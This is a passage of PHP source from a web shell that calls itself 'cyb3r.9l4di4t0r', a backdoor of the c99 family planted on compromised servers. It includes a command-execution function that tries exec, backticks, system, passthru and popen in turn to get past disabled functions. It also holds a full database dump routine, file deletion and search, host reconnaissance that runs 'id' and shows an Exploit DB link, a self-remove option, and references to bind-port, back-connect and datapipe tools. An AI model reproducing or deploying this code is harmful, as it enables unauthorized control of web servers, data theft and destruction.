819 else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
820
821 if (!$ret) {return $ret;}
822
823 }
824
825 }
826
827 closedir($h);
828
829 return TRUE;
830
831}
832
833}
834
835if (!function_exists("fs_move_obj"))
836
837{
838
839function fs_move_obj($d,$t)
840
841{
842
843 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
844
845 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
846
847 if (is_dir($d))
848
849 {
850
851 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
852
853 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
854
855 return fs_move_dir($d,$t);
856
857 }
858
859 elseif (is_file($d))
860
861 {
862
863 if(copy($d,$t)) {return unlink($d);}
864
865 else {unlink($t); return FALSE;}
866
867 }
868
869 else {return FALSE;}
870
871}
872
873}
874
875if (!function_exists("fs_rmdir"))
876
877{
878
879function fs_rmdir($d)
880
881{
882
883 $h = opendir($d);
884
885 while (($o = readdir($h)) !== FALSE)
886
887 {
888
889 if (($o != ".") and ($o != ".."))
890
891 {
892
893 if (!is_dir($d.$o)) {unlink($d.$o);}
894
895 else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
896
897 }
898
899 }
900
901 closedir($h);
902
903 rmdir($d);
904
905 return !is_dir($d);
906
907}
908
909}
910
911if (!function_exists("fs_rmobj"))
912
913{
914
915function fs_rmobj($o)
916
917{
918
919 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
920
921 if (is_dir($o))
922
923 {
924
925 if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
926
927 return fs_rmdir($o);
928
929 }
930
931 elseif (is_file($o)) {return unlink($o);}
932
933 else {return FALSE;}
934
935}
936
937}
938
939if (!function_exists("myshellexec"))
940
941{
942
943function myshellexec($cmd)
944
945{
946
947 global $disablefunc;
948
949 $result = "";
950
951 if (!empty($cmd))
952
953 {
954
955 if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
956
957 elseif (($result = `$cmd`) !== FALSE) {}
958
959 elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
960
961 elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
962
963 elseif (is_resource($fp = popen($cmd,"r")))
964
965 {
966
967 $result = "";
968
969 while(!feof($fp)) {$result .= fread($fp,1024);}
970
971 pclose($fp);
972
973 }
974
975 }
976
977 return $result;
978
979}
980
981}
982
983if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
984
985if (!function_exists("view_perms"))
986
987{
988
989function view_perms($mode)
990
991{
992
993 if (($mode & 0xC000) === 0xC000) {$type = "s";}
994
995 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
996
997 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
998
999 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
1000
1001 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
1002
1003 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
1004
1005 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
1006
1007 else {$type = "?";}
1008
1009
1010
1011 $owner["read"] = ($mode & 00400)?"r":"-";
1012
1013 $owner["write"] = ($mode & 00200)?"w":"-";
1014
1015 $owner["execute"] = ($mode & 00100)?"x":"-";
1016
1017 $group["read"] = ($mode & 00040)?"r":"-";
1018
1019 $group["write"] = ($mode & 00020)?"w":"-";
1020
1021 $group["execute"] = ($mode & 00010)?"x":"-";
1022
1023 $world["read"] = ($mode & 00004)?"r":"-";
1024
1025 $world["write"] = ($mode & 00002)? "w":"-";
1026
1027 $world["execute"] = ($mode & 00001)?"x":"-";
1028
1029
1030
1031 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
1032
1033 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
1034
1035 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
1036
1037
1038
1039 return $type.join("",$owner).join("",$group).join("",$world);
1040
1041}
1042
1043}
1044
1045if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
1046
1047if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
1048
1049if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
1050
1051if (!function_exists("parse_perms"))
1052
1053{
1054
1055function parse_perms($mode)
1056
1057{
1058
1059 if (($mode & 0xC000) === 0xC000) {$t = "s";}
1060
1061 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
1062
1063 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
1064
1065 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
1066
1067 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
1068
1069 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
1070
1071 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
1072
1073 else {$t = "?";}
1074
1075 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
1076
1077 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
1078
1079 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
1080
1081 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
1082
1083}
1084
1085}
1086
1087if (!function_exists("parsesort"))
1088
1089{
1090
1091function parsesort($sort)
1092
1093{
1094
1095 $one = intval($sort);
1096
1097 $second = substr($sort,-1);
1098
1099 if ($second != "d") {$second = "a";}
1100
1101 return array($one,$second);
1102
1103}
1104
1105}
1106
1107if (!function_exists("view_perms_color"))
1108
1109{
1110
1111function view_perms_color($o)
1112
1113{
1114
1115 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
1116
1117 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
1118
1119 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
1120
1121}
1122
1123}
1124
1125if (!function_exists("cyb3rgetsource"))
1126
1127{
1128
1129function cyb3rgetsource($fn)
1130
1131{
1132
1133 global $cyb3r_sourcesurl;
1134
1135 $array = array(
1136
1137 "cyb3r_bindport.pl" => "cyb3r_bindport_pl.txt",
1138
1139 "cyb3r_bindport.c" => "cyb3r_bindport_c.txt",
1140
1141 "cyb3r_backconn.pl" => "cyb3r_backconn_pl.txt",
1142
1143 "cyb3r_backconn.c" => "cyb3r_backconn_c.txt",
1144
1145 "cyb3r_datapipe.pl" => "cyb3r_datapipe_pl.txt",
1146
1147 "cyb3r_datapipe.c" => "cyb3r_datapipe_c.txt",
1148
1149 );
1150
1151}
1152
1153}
1154
1155if (!function_exists("mysql_dump"))
1156
1157{
1158
1159function mysql_dump($set)
1160
1161{
1162
1163 global $shver;
1164
1165 $sock = $set["sock"];
1166
1167 $db = $set["db"];
1168
1169 $print = $set["print"];
1170
1171 $nl2br = $set["nl2br"];
1172
1173 $file = $set["file"];
1174
1175 $add_drop = $set["add_drop"];
1176
1177 $tabs = $set["tabs"];
1178
1179 $onlytabs = $set["onlytabs"];
1180
1181 $ret = array();
1182
1183 $ret["err"] = array();
1184
1185 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
1186
1187 if (empty($db)) {$db = "db";}
1188
1189 if (empty($print)) {$print = 0;}
1190
1191 if (empty($nl2br)) {$nl2br = 0;}
1192
1193 if (empty($add_drop)) {$add_drop = TRUE;}
1194
1195 if (empty($file))
1196
1197 {
1198
1199 $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
1200
1201 }
1202
1203 if (!is_array($tabs)) {$tabs = array();}
1204
1205 if (empty($add_drop)) {$add_drop = TRUE;}
1206
1207 if (sizeof($tabs) == 0)
1208
1209 {
1210
1211 // retrive tables-list
1212
1213 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
1214
1215 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
1216
1217 }
1218
1219 $out = "# Dumped by cyb3rell.SQL v. ".$shver."
1220
1221# Home page: http://ccteam.ru
1222
1223#
1224
1225# Host settings:
1226
1227# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
1228
1229# Date: ".date("d.m.Y H:i:s")."
1230
1231# DB: \"".$db."\"
1232
1233#---------------------------------------------------------
1234
1235";
1236
1237 $c = count($onlytabs);
1238
1239 foreach($tabs as $tab)
1240
1241 {
1242
1243 if ((in_array($tab,$onlytabs)) or (!$c))
1244
1245 {
1246
1247 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
1248
1249 // recieve query for create table structure
1250
1251 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
1252
1253 if (!$res) {$ret["err"][] = mysql_smarterror();}
1254
1255 else
1256
1257 {
1258
1259 $row = mysql_fetch_row($res);
1260
1261 $out .= $row["1"].";\n\n";
1262
1263 // recieve table variables
1264
1265 $res = mysql_query("SELECT * FROM `$tab`", $sock);
1266
1267 if (mysql_num_rows($res) > 0)
1268
1269 {
1270
1271 while ($row = mysql_fetch_assoc($res))
1272
1273 {
1274
1275 $keys = implode("`, `", array_keys($row));
1276
1277 $values = array_values($row);
1278
1279 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
1280
1281 $values = implode("', '", $values);
1282
1283 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
1284
1285 $out .= $sql;
1286
1287 }
1288
1289 }
1290
1291 }
1292
1293 }
1294
1295 }
1296
1297 $out .= "#---------------------------------------------------------------------------------\n\n";
1298
1299 if ($file)
1300
1301 {
1302
1303 $fp = fopen($file, "w");
1304
1305 if (!$fp) {$ret["err"][] = 2;}
1306
1307 else
1308
1309 {
1310
1311 fwrite ($fp, $out);
1312
1313 fclose ($fp);
1314
1315 }
1316
1317 }
1318
1319 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
1320
1321 return $out;
1322
1323}
1324
1325}
1326
1327if (!function_exists("mysql_buildwhere"))
1328
1329{
1330
1331function mysql_buildwhere($array,$sep=" and",$functs=array())
1332
1333{
1334
1335 if (!is_array($array)) {$array = array();}
1336
1337 $result = "";
1338
1339 foreach($array as $k=>$v)
1340
1341 {
1342
1343 $value = "";
1344
1345 if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
1346
1347 $value .= "'".addslashes($v)."'";
1348
1349 if (!empty($functs[$k])) {$value .= ")";}
1350
1351 $result .= "`".$k."` = ".$value.$sep;
1352
1353 }
1354
1355 $result = substr($result,0,strlen($result)-strlen($sep));
1356
1357 return $result;
1358
1359}
1360
1361}
1362
1363if (!function_exists("mysql_fetch_all"))
1364
1365{
1366
1367function mysql_fetch_all($query,$sock)
1368
1369{
1370
1371 if ($sock) {$result = mysql_query($query,$sock);}
1372
1373 else {$result = mysql_query($query);}
1374
1375 $array = array();
1376
1377 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
1378
1379 mysql_free_result($result);
1380
1381 return $array;
1382
1383}
1384
1385}
1386
1387if (!function_exists("mysql_smarterror"))
1388
1389{
1390
1391function mysql_smarterror($type,$sock)
1392
1393{
1394
1395 if ($sock) {$error = mysql_error($sock);}
1396
1397 else {$error = mysql_error();}
1398
1399 $error = htmlspecialchars($error);
1400
1401 return $error;
1402
1403}
1404
1405}
1406
1407if (!function_exists("mysql_query_form"))
1408
1409{
1410
1411function mysql_query_form()
1412
1413{
1414
1415 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
1416
1417 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1418
1419 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
1420
1421 if ((!$submit) or ($sql_act))
1422
1423 {
1424
1425 echo "<table border=0><tr><td><form name=\"cyb3r_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
1426
1427 if ($tbl_struct)
1428
1429 {
1430
1431 echo "<td valign=\"top\"><b>Fields:</b><br>";
1432
1433 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.cyb3r_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
1434
1435 echo "</td></tr></table>";
1436
1437 }
1438
1439 }
1440
1441 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
1442
1443}
1444
1445}
1446
1447if (!function_exists("mysql_create_db"))
1448
1449{
1450
1451function mysql_create_db($db,$sock="")
1452
1453{
1454
1455 $sql = "CREATE DATABASE `".addslashes($db)."`;";
1456
1457 if ($sock) {return mysql_query($sql,$sock);}
1458
1459 else {return mysql_query($sql);}
1460
1461}
1462
1463}
1464
1465if (!function_exists("mysql_query_parse"))
1466
1467{
1468
1469function mysql_query_parse($query)
1470
1471{
1472
1473 $query = trim($query);
1474
1475 $arr = explode (" ",$query);
1476
1477 /*array array()
1478
1479 {
1480
1481 "METHOD"=>array(output_type),
1482
1483 "METHOD1"...
1484
1485 ...
1486
1487 }
1488
1489 if output_type == 0, no output,
1490
1491 if output_type == 1, no output if no error
1492
1493 if output_type == 2, output without control-buttons
1494
1495 if output_type == 3, output with control-buttons
1496
1497 */
1498
1499 $types = array(
1500
1501 "SELECT"=>array(3,1),
1502
1503 "SHOW"=>array(2,1),
1504
1505 "DELETE"=>array(1),
1506
1507 "DROP"=>array(1)
1508
1509 );
1510
1511 $result = array();
1512
1513 $op = strtoupper($arr[0]);
1514
1515 if (is_array($types[$op]))
1516
1517 {
1518
1519 $result["propertions"] = $types[$op];
1520
1521 $result["query"] = $query;
1522
1523 if ($types[$op] == 2)
1524
1525 {
1526
1527 foreach($arr as $k=>$v)
1528
1529 {
1530
1531 if (strtoupper($v) == "LIMIT")
1532
1533 {
1534
1535 $result["limit"] = $arr[$k+1];
1536
1537 $result["limit"] = explode(",",$result["limit"]);
1538
1539 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
1540
1541 unset($arr[$k],$arr[$k+1]);
1542
1543 }
1544
1545 }
1546
1547 }
1548
1549 }
1550
1551 else {return FALSE;}
1552
1553}
1554
1555}
1556
1557if (!function_exists("cyb3rfsearch"))
1558
1559{
1560
1561function cyb3rfsearch($d)
1562
1563{
1564
1565 global $found;
1566
1567 global $found_d;
1568
1569 global $found_f;
1570
1571 global $search_i_f;
1572
1573 global $search_i_d;
1574
1575 global $a;
1576
1577 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
1578
1579 $h = opendir($d);
1580
1581 while (($f = readdir($h)) !== FALSE)
1582
1583 {
1584
1585 if($f != "." && $f != "..")
1586
1587 {
1588
1589 $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
1590
1591 if (is_dir($d.$f))
1592
1593 {
1594
1595 $search_i_d++;
1596
1597 if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
1598
1599 if (!is_link($d.$f)) {cyb3rfsearch($d.$f);}
1600
1601 }
1602
1603 else
1604
1605 {
1606
1607 $search_i_f++;
1608
1609 if ($bool)
1610
1611 {
1612
1613 if (!empty($a["text"]))
1614
1615 {
1616
1617 $r = @file_get_contents($d.$f);
1618
1619 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
1620
1621 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
1622
1623 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
1624
1625 else {$bool = strpos(" ".$r,$a["text"],1);}
1626
1627 if ($a["text_not"]) {$bool = !$bool;}
1628
1629 if ($bool) {$found[] = $d.$f; $found_f++;}
1630
1631 }
1632
1633 else {$found[] = $d.$f; $found_f++;}
1634
1635 }
1636
1637 }
1638
1639 }
1640
1641 }
1642
1643 closedir($h);
1644
1645}
1646
1647}
1648
1649if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
1650
1651//Sending headers
1652
1653@ob_start();
1654
1655@ob_implicit_flush(0);
1656
1657function onphpshutdown()
1658
1659{
1660
1661 global $gzipencode,$ft;
1662
1663 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
1664
1665 {
1666
1667 $v = @ob_get_contents();
1668
1669 @ob_end_clean();
1670
1671 @ob_start("ob_gzHandler");
1672
1673 echo $v;
1674
1675 @ob_end_flush();
1676
1677 }
1678
1679}
1680
1681function cyb3rexit()
1682
1683{
1684
1685 onphpshutdown();
1686
1687 exit;
1688
1689}
1690
1691
1692if (empty($tmpdir))
1693
1694{
1695
1696 $tmpdir = ini_get("upload_tmp_dir");
1697
1698 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
1699
1700}
1701
1702$tmpdir = realpath($tmpdir);
1703
1704$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
1705
1706if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
1707
1708if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
1709
1710else {$tmpdir_logs = realpath($tmpdir_logs);}
1711
1712if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
1713
1714{
1715
1716 $safemode = TRUE;
1717
1718 $hsafemode = "<font color=green>ON (secure)</font>";
1719 $sfmode = "<font color=green><b>ON (secure)</b></font>";
1720}
1721
1722else {$safemode = FALSE; $hsafemode = "<font color=red>OFF (not secure)</font>"; $sfmode = "<font color=red><b>OFF (not secure)</b></font>";}
1723
1724$v = @ini_get("open_basedir");
1725
1726if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
1727
1728else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
1729
1730$sort = htmlspecialchars($sort);
1731
1732if (empty($sort)) {$sort = $sort_default;}
1733
1734$sort[1] = strtolower($sort[1]);
1735
1736$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
1737
1738if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
1739
1740$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'[<a href="http://www.google.com/search?q='.$kernel.' '. $release.'" target=_blank ><b><u><font color="red">Google</font></u></b></a>]',htmlspecialchars($DISP_SERVER_SOFTWARE));
1741
1742@ini_set("highlight.bg",$highlight_bg); //FFFFFF
1743
1744@ini_set("highlight.comment",$highlight_comment); //#FF8000
1745
1746@ini_set("highlight.default",$highlight_default); //#0000BB
1747
1748@ini_set("highlight.html",$highlight_html); //#000000
1749
1750@ini_set("highlight.keyword",$highlight_keyword); //#007700
1751
1752@ini_set("highlight.string",$highlight_string); //#DD0000
1753
1754if (!is_array($actbox)) {$actbox = array();}
1755
1756$dspact = $act = htmlspecialchars($act);
1757
1758$disp_fullpath = $ls_arr = $notls = null;
1759
1760$ud = urlencode($d);
1761
1762?>
1763
1764<center>
1765<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
1766<tr>
1767<td><center><p><a href="?"><img src="http://s15.postimage.org/5oskuq363/image.png" height="68px" width="66px" border="0px"/></a><br />cyb3r.9l4di4t0r<br /><?php echo $shver; ?> </p></center></td>
1768<td width="90%">
1769<TABLE style="BORDER-COLLAPSE: collapse" borderColorDark=#c0c0c0 cellPadding=3 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0>
1770 <tr>
1771 <td width="9%" ><b>Software :</b></td>
1772 <td ><b><?php echo $DISP_SERVER_SOFTWARE.' [<a href="'.$expltlink.'" target=_blank><b><u><font color="yellow">Exploit DB</font></u></b></a>]'; ?></b></td>
1773 <td width="9%"><?php echo "<a href=\"".$surl."act=serverinfo\" ><b><u>Server</u> I.P.</b></a>"?></td>
1774 <td width="9%"><b><?php echo getenv('SERVER_ADDR'); ?></b></td>
1775 </tr>
1776 <tr>
1777 <td width="9%" ><?php echo "<a href=\"".$surl."act=security\" ><b><u>Uname-a</u> :</b></a>"?></td>
1778 <td ><b><?php echo wordwrap(php_uname(),90,"<br>",1); ?></b></td>
1779 <td width="9%"><?php echo "<a href=\"".$surl."act=clientinfo\" ><b><u>Client</u> I.P.</b></a>"?></td>
1780 <td width="9%"><b><?php echo $_SERVER['REMOTE_ADDR']; ?></b></td>
1781 </tr>
1782 <tr>
1783 <td width="9%" ><?php echo "<a href=\"".$surl."act=processes\" ><b><u>Username</u> :</b></a>"?></td>
1784 <td ><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b></td>
1785 <td width="9%"><?php echo "<a href=\"".$surl."act=systeminfo\" ><b><u>Sys</u>tem<u>info</u></b></a>"?></td>
1786 <td width="9%"></td>
1787 </tr>
1788 <tr>
1789 <td width="9%" ><b>Safe Mode :</b></td>
1790 <td ><b><?php echo $hsafemode; ?></b></td>
1791 <td width="9%"><b></b></td>
1792 <td width="9%"></td>
1793 </tr>
1794 <tr>
1795 <td width="9%" ><b>Directory :</b></td>
1796 <td ><b>
1797 <?php
1798
1799$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
1800
1801if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
1802
1803$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
1804
1805if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
1806
1807$d = str_replace("\\\\","\\",$d);
1808
1809$dispd = htmlspecialchars($d);
1810
1811$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
1812
1813$i = 0;
1814
1815foreach($pd as $b)
1816
1817{
1818
1819 $t = "";
1820
1821 $j = 0;
1822
1823 foreach ($e as $r)
1824
1825 {
1826
1827 $t.= $r.DIRECTORY_SEPARATOR;
1828
1829 if ($j == $i) {break;}
1830
1831 $j++;
1832
1833 }
1834
1835 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
1836
1837 $i++;
1838
1839}
1840
1841echo "&nbsp;&nbsp;&nbsp;";
1842
1843if (is_writable($d))
1844
1845{
1846
1847 $wd = TRUE;
1848
1849 $wdt = "<font color=green>[ ok ]</font>";
1850
1851 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
1852
1853}
1854
1855else
1856
1857{
1858
1859 $wd = FALSE;
1860
1861 $wdt = "<font color=red>[ Read-Only ]</font>";
1862
1863 echo "<b>".view_perms_color($d)."</b>";
1864
1865}
1866 ?>
1867 </b></td>
1868 <td width="9%"><?php echo "<a href=\"".$surl."act=selfremove\" ><b><font color='orange'>Self <u>Remove</u></font></b></a>"?></td>
1869 <td width="9%"></td>
1870 </tr>
1871 <tr>
1872 <td width="9%" ><b>Free Space :</b></td>
1873 <td ><b>
1874 <?php if (is_callable("disk_free_space"))
1875
1876{
1877
1878 $free = disk_free_space($d);
1879
1880 $total = disk_total_space($d);
1881
1882 if ($free === FALSE) {$free = 0;}
1883
1884 if ($total === FALSE) {$total = 0;}
1885
1886 if ($free < 0) {$free = 0;}
1887
1888 if ($total < 0) {$total = 0;}
1889
1890 $used = $total-$free;
1891
1892 $free_percent = round(100/($total/$free),2);
1893
1894 echo "<b>".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
1895
1896}?>
1897 </b></td>
1898 <td width="9%"><?php echo "<a href=\"".$surl."act=feedback\" ><b>Feed<u>back</u></b></a>"?></td>
1899 <td width="9%"></td>
1900 </tr>
1901 <tr>
1902 <td width="9%" ><b>Drives :</b></td>
1903 <td ><b>
1904 <?php $letters = "";
1905
1906if ($win)
1907
1908{
1909
1910 $v = explode("\\",$d);
1911
1912 $v = $v[0];
1913
1914 foreach (range("a","z") as $letter)
1915
1916 {
1917
1918 $bool = $isdiskette = in_array($letter,$safemode_diskettes);
1919
1920 if (!$bool) {$bool = is_dir($letter.":\\");}
1921
1922 if ($bool)
1923
1924 {
1925
1926 $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
1927
1928 if ($letter.":" != $v) {$letters .= $letter;}
1929
1930 else {$letters .= "<font color=green>".$letter."</font>";}
1931
1932 $letters .= " ]</a> ";
1933
1934 }
1935
1936 }
1937
1938 if (!empty($letters)) {echo $letters."<br>";}
1939}
1940 ?></b></td>
1941 <td width="9%"><a href="<?php echo $self.'?logout'?>"><b><font color='green'>I'm <u>Out</u> !</font></b></a></td>
1942 <td width="9%"></td>
1943 </tr>
1944
1945 </table>
1946</td>
1947
1948</tr>
1949</table>
1950
1951<TABLE style="BORDER-COLLAPSE: collapse" height="1" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1>
1952<tr><td width="100%" valign="top">
1953 ADMIN: <?php echo $_SERVER['SERVER_ADMIN'];?> <font color="silver">|</font>
1954 PHP : <?php echo "<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>".$phpVersion."</u></b></a>"?> <font color="silver">|</font>
1955 Curl : <?php echo function_exists('curl_version')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
1956 Oracle : <?php echo function_exists('ocilogon')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
1957 MySQL : <?php echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");?> <font color="silver">|</font>
1958 MSSQL : <?php echo function_exists('mssql_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
1959 PostgreSQL : <?php echo function_exists('pg_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
1960 Disable functions : <?php getDisabledFunctions(); ?>
1961 </td></tr>
1962</table>
1963
1964<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
1965<tr><td width="100%" valign="top">
1966 <?php
1967 if (count($quicklaunch) > 0)
1968
1969 {
1970
1971 foreach($quicklaunch as $item)
1972
1973 {
1974
1975 $item[1] = str_replace("%d",urlencode($d),$item[1]);
1976
1977 $item[1] = str_replace("%sort",$sort,$item[1]);
1978
1979 $v = realpath($d."..");
1980
1981 if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
1982
1983 $item[1] = str_replace("%upd",urlencode($v),$item[1]);
1984
1985 echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
1986
1987 }
1988
1989 }?>
1990 </td>
1991 </tr>
1992 </table><br>
1993<?php
1994
1995if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
1996
1997echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
1998
1999if ($act == "") {$act = $dspact = "ls";}
2000
2001if ($act == "sql")
2002
2003{
2004
2005 $sql_surl = $surl."act=sql";
2006
2007 if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
2008
2009 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
2010
2011 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
2012
